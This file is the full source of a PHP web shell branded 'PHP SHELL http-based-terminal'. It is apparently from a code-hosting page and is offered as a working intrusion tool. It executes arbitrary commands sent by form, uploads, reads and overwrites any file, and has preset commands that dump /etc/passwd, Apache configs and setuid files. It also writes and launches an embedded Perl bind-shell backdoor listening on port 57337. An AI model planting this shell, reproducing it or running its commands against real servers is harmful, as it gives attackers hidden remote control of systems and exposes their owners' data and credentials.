290 lines
8.7 KiB
Plaintext
290 lines
8.7 KiB
Plaintext
<?
|
|
error_reporting(0);
|
|
################################
|
|
# PHP SHELL http-based-terminal #
|
|
# by PHP SHELL #
|
|
################################
|
|
?>
|
|
<?$dir=realpath("./")."/";
|
|
$dir=str_replace("\\","/",$dir);
|
|
?>
|
|
<?
|
|
$dirfile="$file_to_download";
|
|
if (file_exists("$dirfile"))
|
|
{
|
|
header("location: $dirfile");
|
|
}
|
|
?>
|
|
<title>PHP SHELL http-based-terminal - <? echo $dir?></title>
|
|
<!-- PHP SHELL http-based-terminal - DANGEROUS GHOST` -->
|
|
<style>
|
|
BODY {
|
|
margin-top: 1px;
|
|
margin-right: 1px;
|
|
margin-bottom: 1px;
|
|
margin-left: 1px;
|
|
}
|
|
input {
|
|
font-family: Verdana;
|
|
font-size: 10px;
|
|
color: black;
|
|
background-color: #335F92;
|
|
border: solid 2px;
|
|
border-color: black
|
|
}
|
|
textarea {
|
|
color: black;
|
|
background-color: #335F92;
|
|
border: solid 2px;
|
|
border-color: black
|
|
}
|
|
select {
|
|
background-color: #335F92;
|
|
font: 10px verdana;
|
|
}
|
|
A:link {color:white;
|
|
text-decoration: none
|
|
}
|
|
A:visited { color:white;
|
|
text-decoration: none
|
|
}
|
|
A:active {color:white;
|
|
text-decoration: none
|
|
}
|
|
A:hover {color:red;
|
|
text-decoration: none
|
|
}
|
|
</style>
|
|
<center>
|
|
<table bgcolor=black cellspacing=1 width=100%><tr><td>
|
|
<table bgcolor=#363d4e width=100%>
|
|
<tr><td><center><b>
|
|
<font size=-2 face=verdana color=red>n57http-based Terminal<br>
|
|
<table width=100% heigth=0 cellpadding=0 cellspacing=0>
|
|
<tr><td>
|
|
</font>
|
|
<font size=-2 face=verdana color=white>
|
|
<form method=post>
|
|
<font color=white>
|
|
<b>::Exec command::</b><br>
|
|
<input name=exec size=50% value='<?echo"$exec";?>'><br>
|
|
<input name=dirname size=50% value='<?
|
|
if ($dirname == "") {print "/tmp/";}
|
|
else {
|
|
echo"$dirname";}?>'>
|
|
<?if($dirname !== "") { chdir($dirname);}?><br>
|
|
<input type=submit value="..Exec.. ">
|
|
</form>
|
|
<form enctype="multipart/form-data" method=post>
|
|
<b>::File upload::</b><br>
|
|
<input name=userfile type=file size=50%><br>
|
|
<input name=dirname size=50% value='<?
|
|
if ($dirname == "") {print "/tmp/";}
|
|
else {
|
|
echo"$dirname";}?>'><Br>
|
|
<input name=submit type=submit value=" Upload">
|
|
</form>
|
|
<form method=post>
|
|
<b>::Encode to md5,base64,Des::</b><br>
|
|
<input name='chack' value='<?echo"$chack"?>' size=31><br>
|
|
<?
|
|
if ($chack == "");
|
|
else {
|
|
echo "<font size=-2 face=verdana color=white><b>- $chack -</b></font><br>";
|
|
echo "<font size=-2 face=verdana color=white><b><u>MD5:</u></b> "; echo md5("$chack"); echo "<br></font>";
|
|
echo "<font size=-2 face=verdana color=white><b><u>Encode base64:</u></b> "; echo base64_encode("$chack"); echo "<br></font>";
|
|
echo "<font size=-2 face=verdana color=white><b><u>Decode base64:</u></b> "; echo base64_decode("$chack"); echo "<br></font>";
|
|
echo "<font size=-2 face=verdana color=white><b><u>DES:</u></b> "; echo crypt("$chack"); echo "<br></font>";
|
|
}
|
|
?>
|
|
</form>
|
|
|
|
|
|
</td><td valign=top><div align=right>
|
|
<font size=-2 face=verdana color=white>
|
|
<form method=post>
|
|
<br><b>::Fast CMD::<Br></b><select size="1" name="runcmd">
|
|
<option value='1'>Find *-rw-* files</option>
|
|
<option value='2'>Find all config files</option>
|
|
<option value='3'>ps aux</option>
|
|
<option value='4'>cat /etc/passwd</option>
|
|
<option value='5'>cat /etc/httpd/conf/httpd.conf</option>
|
|
<option value='6'>cat <dir>/conf/httpd.conf</option>
|
|
<option value='7'>ls -la /var/lib/mysql/</option>
|
|
<option value='8'>netstat -a</option>
|
|
<option value='9'>perl --help</option>
|
|
<option value='10'>gcc --help</option>
|
|
<option value='11'>tar --help</option>
|
|
<option selected>o...Select command...o</option>
|
|
</select><br>
|
|
<input type=submit value='...Exec...'></form>
|
|
<form method=post>
|
|
<b>::Edit/Create file::<br></b> <input name=editfile value='<?
|
|
if ($dirname == "") {print "/tmp/file.txt";}
|
|
else {
|
|
echo"$dirname$editfile";}?>'>
|
|
</form>
|
|
<form method=post>
|
|
<b>::Download file::<Br></b>
|
|
<input name='file_to_download' value='<?
|
|
if ($dirname == "") {print "/tmp/file.txt";}
|
|
else {
|
|
echo "$dirname","file.txt";}?>'><br>
|
|
<input type=submit value=Download>
|
|
</form>
|
|
</div>
|
|
</td></tr></table>
|
|
<div align=left><font size=-2 face=verdana color=white>
|
|
<table border=1 width=100%><tr><td>
|
|
<font size=-2 face=verdana color=white>
|
|
<b>Kernel: </b>
|
|
<? passthru("uname -a");?>
|
|
<br>
|
|
<b>ID: </b>
|
|
<? passthru("id");?><br>
|
|
<b>Dir:</b> <? echo getcwd();?></div></td><td valign=top width=190><div align=right>
|
|
<font size=-2 face=verdana color=white>
|
|
<form method=post>
|
|
If SafeMode is On, then use this:
|
|
<input name=phpdir size=34 value='<?
|
|
if ($phpdir == "") {print "/Directory";}
|
|
else {
|
|
echo"$phpdir";}?>'>
|
|
</form>
|
|
|
|
<? ######## perl shell #########
|
|
$perlshell = "
|
|
#!/usr/bin/perl
|
|
use Socket;
|
|
#rintf \"BS9n\";
|
|
#lush();
|
|
+port= 57337;
|
|
+proto= getprotobyname(\'tcp\');
|
|
+cmd= \"lpd\";
|
|
+system= \'echo \"(`whoami`@`uname -n`:`pwd`)\"; /bin/sh\';
|
|
+0 = +cmd;
|
|
socket(SERVER, PF_INET, SOCK_STREAM, +proto) or die \"socket:$!\";
|
|
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack(\"l\", 1)) or die \"setsockopt: $!\";
|
|
bind(SERVER, sockaddr_in(+port, INADDR_ANY)) or die \"bind: +!\";
|
|
listen(SERVER, SOMAXCONN)or die \"listen: +!\";
|
|
for(; +paddr = accept(CLIENT, SERVER); close CLIENT)
|
|
{
|
|
open(STDIN, \">&CLIENT\");
|
|
open(STDOUT, \">&CLIENT\");
|
|
open(STDERR, \">&CLIENT\");
|
|
system(+system);
|
|
close(STDIN);
|
|
close(STDOUT);
|
|
close(STDERR);
|
|
}
|
|
|
|
";
|
|
############# C++ shell #########
|
|
$cshell = "
|
|
|
|
";
|
|
|
|
?>
|
|
|
|
</div></td></tr></table>
|
|
</td></tr>
|
|
<font size=-2 face=verdana color=white><B>Backdoor directory: <?echo $dir?></b>
|
|
<tr><td>
|
|
<? if($editfile == ""); else {echo '
|
|
<form method=post>
|
|
<textarea name=editpost cols=70 rows=20>';
|
|
$filename = "$editfile";
|
|
$fd = fopen ($filename, "r");
|
|
$out = fread ($fd, filesize ($filename));
|
|
fclose ($fd);
|
|
echo "$out";
|
|
echo '</textarea><br>
|
|
<input name=editfile size=100% value=';echo $editfile;echo'>
|
|
<input type=submit value=-Edit-><br>
|
|
';
|
|
if ($editpost == ""); else {
|
|
$editpost = str_replace("\\","",$editpost);
|
|
$fp = fopen($editfile, w);
|
|
fwrite($fp,"$editpost");
|
|
print "<center><font size=-2 face=verdana color=green><b>File <u>$editfile</u> edited/created success!</b></font><br></center>";
|
|
print "<a href=http://www.PHPshell.org target=_blank><font size=-2 face=verdana color=white><center>:: PHPshell.org http-based-terminal ::</a>";
|
|
print "</td></tr></table></td></tr></table>";exit;
|
|
}
|
|
;}
|
|
?>
|
|
<textarea name=terminal cols=121 rows=20>
|
|
<?
|
|
if($fileperl == "nst.pl") {
|
|
$perlshell = str_replace("+","$",$perlshell);
|
|
$perlshell = str_replace("\\","",$perlshell);
|
|
$perlshell = str_replace("9","\\",$perlshell);
|
|
$nst = fopen("/tmp/nst.pl", w);
|
|
fwrite($nst, "$perlshell");
|
|
exec("perl /tmp/nst.pl");
|
|
echo "If perl exist, and no firewall on serv (etc), then you will got shell on port 57337";
|
|
}
|
|
|
|
?>
|
|
<?
|
|
if (($phpdir == "") or ($phpdir == "/Directory"));
|
|
else {
|
|
$dh = opendir($phpdir) or die("couldn't open directory");
|
|
while (!(($file = readdir($dh)) === false)) {
|
|
if (is_dir("$phpdir/$file")) {
|
|
print "\n[D] : ";
|
|
}
|
|
print "$file\n";
|
|
}
|
|
closedir($dh);}
|
|
?>
|
|
<?
|
|
### 4tobi dobavit kamandu, to dabavte jejo tut i smatrite vi6e
|
|
### tam gde <option>
|
|
if($runcmd == "1") {passthru("find / -type f -perm -04000 -ls");}
|
|
if($runcmd == "2") {passthru("locate config");}
|
|
if($runcmd == "3") {passthru("ps aux");}
|
|
if($runcmd == "4") {passthru("cat /etc/passwd");}
|
|
if($runcmd == "5") {passthru("cat /etc/httpd/conf/httpd.conf");}
|
|
if($runcmd == "6") {passthru("cat /usr/local/apache/conf/httpd.conf");}
|
|
if($runcmd == "7") {passthru("ls -la /var/lib/mysql");}
|
|
if($runcmd == "8") {passthru("netstat -a");}
|
|
if($runcmd == "9") {passthru("perl --help");}
|
|
if($runcmd == "10") {passthru("gcc --help");}
|
|
if($runcmd == "11") {passthru("tar --help");}
|
|
#if($runcmd == "12") {passthru("");}
|
|
#if($runcmd == "13") {passthru("");}
|
|
# etc..
|
|
?>
|
|
<?
|
|
if (isset($submit)){
|
|
copy($userfile,$dirname.$userfile_name);
|
|
if (!is_uploaded_file ($userfile)){
|
|
echo "$userfile_name can't upload";
|
|
}
|
|
}
|
|
if (is_uploaded_file ($userfile)){
|
|
echo "Uploaded to: $dirname$userfile_name\n\n";
|
|
}
|
|
?>
|
|
<?
|
|
if (($exec == "") or ($exec == "ls -la")) {print passthru("ls -la");}
|
|
else
|
|
passthru($exec);
|
|
?>
|
|
</textarea>
|
|
<table width=100% heigth=0 cellpadding=0 cellspacing=0><tr><td valign=top><form method=post>
|
|
<font size=-2 face=verdana color=white>
|
|
<b>Run backdoor on port 57337
|
|
<input type=hidden name=fileperl value='nst.pl'>
|
|
<input type=submit value='Open'><br>[Perl] </b>
|
|
</form></td><td valign=top><div align=right>
|
|
<!-- <form method=post> -->
|
|
<b><input type=submit value='Open'>
|
|
<font size=-2 face=verdana color=white>
|
|
<!-- <input type=hidden name=filec value='nst.c'> -->
|
|
Run backdoor on port 57338<br></b>Soon <b>[C++]<sub></sub></b>
|
|
<!-- </form> --> </div></td></tr></table>
|
|
<? echo "<a href=http://www.PHPshell.org target=_blank><font size=-2 face=verdana><center>PHPshell.org http-based-terminal v1.0 </a>";?>
|
|
</td></tr></table></td></tr></table>';
|
|
?>
|